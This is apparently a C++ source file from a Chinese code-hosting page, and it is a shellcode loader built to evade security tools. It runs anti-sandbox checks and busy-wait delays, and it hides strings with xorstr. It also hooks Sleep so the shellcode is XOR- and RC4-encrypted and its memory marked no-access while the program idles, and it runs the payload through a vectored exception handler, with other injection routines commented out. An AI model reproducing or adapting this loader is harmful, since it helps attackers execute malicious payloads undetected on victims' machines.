代码拉取完成,页面将自动刷新
#include<stdio.h>
#include<Windows.h>
#include"CodeInject.h"
#include"AntiSandbox.h"
#include"Loader.h"
#include"shellcode.h"
#include"MyHook.h"
#include"xorstr.hpp"
#include"Crypto.h"
CInlineHook MyHookObj;
VOID WINAPI DetourSleep(_In_ DWORD dwMilliseconds)
{
DWORD OldProtect = 0;
MyHookObj.UnHook64();
Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
VirtualProtect(shellcode, 0x1000, PAGE_NOACCESS, &OldProtect);
Sleep(dwMilliseconds);
VirtualProtect(shellcode, 0x1000, PAGE_EXECUTE_READWRITE, &OldProtect);
Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
MyHookObj.ReHook64();
}
void __forceinline delay()
{
for (int i = 0; i < 0xFFFFFF*5; ++i)
Sleep(0);
}
int main()
{
#ifdef ENCODE
Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
for (size_t i = 0; i < len_shellcode; i++)
printf("0x%02x,", shellcode[i]);
#else
//CHAR MyName[MAX_PATH] = "nvcontainer.exe";
//AntiSandbox::AntiSandboxByName(MyName);
AntiSandbox::AntiSandboxByRuntime();
//AntiSandbox::AntiSandboxByRuntimeEx();
delay();
MyHookObj.Hook64(xorstr_("KERNEL32.DLL"), xorstr_("Sleep"), (PROC)DetourSleep);
Crypto::rc4_crypt(shellcode, len_shellcode, rc4_key, rc4_key_len);
Crypto::XORrecoder(shellcode, len_shellcode, xor_key);
//Loader::RunShellCode_1(shellcode);
//Loader::RunShellCode_2(shellcode);
//Loader::InjectShellCode_1(shellcode);
//Loader::CertEnumSystemStoreCallbackRunShellcode(shellcode);
Loader::VehRunShellcode(shellcode);
#endif
return 0;
}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。